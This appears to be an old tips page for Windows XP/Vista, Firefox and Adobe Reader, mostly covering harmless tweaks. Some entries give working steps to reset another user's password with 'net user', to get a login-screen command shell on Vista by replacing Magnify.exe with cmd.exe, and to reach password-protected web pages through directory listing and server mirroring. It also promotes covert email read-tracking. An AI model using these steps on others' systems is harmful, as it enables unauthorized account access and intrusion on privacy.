Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options... and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.


XP comes with a free Network Activity Light, just in case you can't see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You'll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.


The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.


You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By... Show In Groups.


Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.


Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.

Change a Windows XP Password widout knowing the previous one ...

1.FIRST GO TO START BUTTON.
2.THEN GO TO RUN .
3.RUN CMD .
4.FIRST RUN NET USER COMMAND TO SEE WHICH ARE THE USER IN YOUR SYSTEM.
5.THEN RUN NET USER "USER NAME " "PASSWORD" WITH OUT DOUBLE QUOTES WHICH U WANT TO CHANGE.
6.THEN IT DISPLAY THE COMMAND COMPLETED SUCCESSFULLY.
7.AND YOU HACK THE XP BY CHANGING.

Get ur old 4goten passwords 4m Firefox ...

    Whenever you log in to a website using your username and password, you'll be prompted by Firefox 3.0 whether you'd like Firefox to remember this password.If you click on Remember, the next time you visit the website, it'll automatically enter the username and password for your convenience.Now, back to the topic. Let's say you saved your G Mail password in Firefox. After months or years gone by and you don't remember the password you set for my G Mail. You started to panic and desperately need to get back your G Mail password.Don't worry, here's how you can find the hidden GMail password in Firefox.Firefox 3.0 is much better than Internet Explorer in terms of managing "remembered" logins. In Internet Explorer, there is no built-in feature where you can manage or view your saved login information. That's why you need third party tools to reveal the passwords hidden under asterisks. As for Firefox 3.0, you can access remembered passwords with a few clicks.To view your remembered passwords in Firefox browser, go to Tools, and click on Options. Go to Security tab and click on the Show Passwords button. A remember password dialog box will appear. Click on the Show Passwords button again and a new column with password will appear

Remove the shortcut arrow ...

1.Open Reg Edit.
2.Open the Key HKEY_CLASSES_ROOT.
3.Open the Key LNKFILE.
4.Delete the value IsShortcut.
5.Open the next Key PIFFILE.
6.Delete the value IsShortcut.
7.Restart the Windows.

Delete n undeletable file ...

Open a Command Prompt window and leave it open.Close all open programs. Click Start, Run and enterTASKMGR.EXE Go to the Processes tab and EndProcess on Explorer.exe. Leave Task Manager open.Go back to the Command Prompt window and changeto the directory to that directory in which the undeletable file islocated in. At the command prompt type DEL whereis the file you wish to delete. Go back to Task Manager,click File, New Task and enter EXPLORER.EXE torestart the GUI shell. Close Task Manager.

Create a Shut-down shortcut icon ...

Navigate to ur desktop. On the desktop, right-click and go to New, then to Shortcut (in other words, create a new shortcut). You should now see a pop-up window instructing you to enter a command line path.Use this path in "Type Location of the Item"SHUTDOWN -s -t 01If the C: drive is not ur local hard drive, then replace "C" with the correct letter of the hard drive. Click the "Next" button. Name the shortcut and click the "Finish" button. Now whenever u want to shut down, just click on this shortcut and u're done.

Open Adobe Reader at a flash ...

Adobe reader takes a few seconds to load when open a pdf document. There is a way to speed up the loading.
1. Go to the installation folder of acrobat reader(C:\program files\adobe\acrobat\reader\.. whatever)
2. Cut all the files and folders from the "plugins"(or plug_ins) directory to the "Optional"directory. Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).
3.Now your Adobe reader will load very fast.

NOTE : This doesn't work for the latest Adobe Reader 11. 

Open Firefox in a Firefox ...

You can run Firefox inside firefox just by typing following url.How about Opening Firefox inside Firefox which is again inanother Firefox.And its really easy too just type in this url inFirefox's address bar and there you go!Firefox inside Firefox!copy paste following url in a web browser (mozilla firefox).chrome://browser/content/browser.xul

System Shutdown in a flash ...

You can shutdown your computer within 3seconds.. yes it is possible.. simple trickfollow the steps:1.press Ctrl+Alt+Del. It opens task manager.2.Go to shutdown Tab.3.Now Press and HOLD Ctrl key and then click TURN OFF option.NOW YOUR COMPUTER WILL TURN OFF WITHIN FEW SECONDS.

E-Mail Tracking ...

   Find out email sent by u is read or not.Now you can find out when your email has been read by the recipient! No more guessing: "Has he or she read my email yet?"SpyPig is a simple email tracking system that sends you a notification email as soon as the recipient opens and reads your message.It works with virtually all modern email programs: Outlook, Eudora, Yahoo Email, Gmail, Hotmail, AOL Email and many others.Best of all, SpyPig is FREE! No spam, no virus, no adware। You can use it as often as you like, and there's no catch.The system is very easy to use. In just few minutes, you'll be able to use it like a real spy!To start using SpyPig, follow the simple steps in the SpyPig Farm .

Hacking password protected sites ...

   There are many ways to defeat java-script protected websites. Some are very simplistic, such as hitting ctl-alt-delwhen the password box is displayed, to simply turning offjava capability, which will dump you into the default page.You can try manually searching for other directories, bytyping the directory name into the url address box of yourbrowser,ie: you want access to www.target.com . Try typingwww.target.com/images .(almost every web site has an imagesdirectory) This will put you into the images directory,and give you a text list of all the images located there.Often, the title of an image will give you a clue to thename of another directory. ie: in www.target.com/images,there is a .gif named gamestitle.gif . There is a goodchance then, that there is a 'games' directory on the site,so you would then type in www.target.com/games, and if it isa valid directory, you again get a text listing of all thefiles available there.For a more automated approach, use aprogram like WEB SNAKE from anawave, or Web Wacker. Theseprograms will create a mirror image of an entire web site,showing all directories,or even mirror a complete server.They are indispensable for locating hidden files and directories.What do you do if you can't get past an opening "PasswordRequired" box? First do an WHOIS Lookup for the site. In ourexample, www.target.com . We find it's hosted by www.host.comat 100.100.100. 1. We then go to 100.100.100.1, and then launchWeb Snake, and mirror the entire server. Set Web Snake to NOTdownload anything over about 20K. (not many HTML pages arebigger than this) This speeds things up some, and keeps youfrom getting a lot of files and images you don't care about.This can take a long time, so consider running it right before bedtime.Once you have an image of the entire server, you look throughthe directories listed, and find /target. When we open thatdirectory, we find its contents, and all of its sub-directories listed.Let's say we find /target/games/zip/zipindex.html . This would be theindex page that would be displayed had you gone through thepassword procedure, and allowed it to redirect you here.By simply typing in the url www.target.com/games/zip/zipindex.htmlyou will be on the index page and ready to follow the links

Windows "Vista" password hack ...

1. Insert the Windows Vista DVD into the DVD drive and then restart the computer.  2. Change Boot Options 1st Priority to Optical Drive.  3. When system booting up, if the message “Press any key to boot from cd” appears,immediately press Enter.   4. On Language Settings, Time and Currency and Keyboard Layout screen, just choose the correct settings then click Next.   5. On Install Now screen, click Repair. Note: Click No just in case you get the message: Windows found problems with your computer’s startup options.   6. On the System Recovery Options screen, under Operating System, click Windows Vista then click Next. Then select Command Prompt.   7. At the command prompt windows, type the following command then press Enter after typing each command:c:cd windows\system32echo ~takeown /f %1 /r /d y > TakeControlOf.cmdecho ~icacls %1 /grant administrators:F /tren Magnify.exe Magnify.oldren cmd.exe Magnify.exe   8. Restart the computer.   9. On the Welcome Screen, click the Ease button.   10. Check Make items on the screen larger then click OK.   11. At the prompt, type the command then press Enter.net user Administrator /active:yesexit   12. Restart the computer.   13. At the welcome screen, logon using the local administrator account.   14. Access Control Panel then click User Accounts. Select the username of the account you can’t login to then remove the password.   15. Log off on the current local administrator account your are logon to.   16. Check if you can logon to your user account now.   17. Open c:\windows\system32.   18. Right click on Magnify.exe, select Properties -> Security -> Advanced -> Owner -> Edit -> Administrators then click OK.   19. Select Edit -> Administrators -> Full Control then click Apply then OK.   20. Rename Magnify.old to Magnify.exe   21. Open command prompt then type the command then press Enter.net user Administrator /active:no

Shortcut to any folder on the desktop toolbar...

- Right click on the toolbar...
- Go to toolbar list...
- Click on new toolbar...
- Select the location of the folder on ur drive...
- Then click ok...
- U 'll get a shortcut...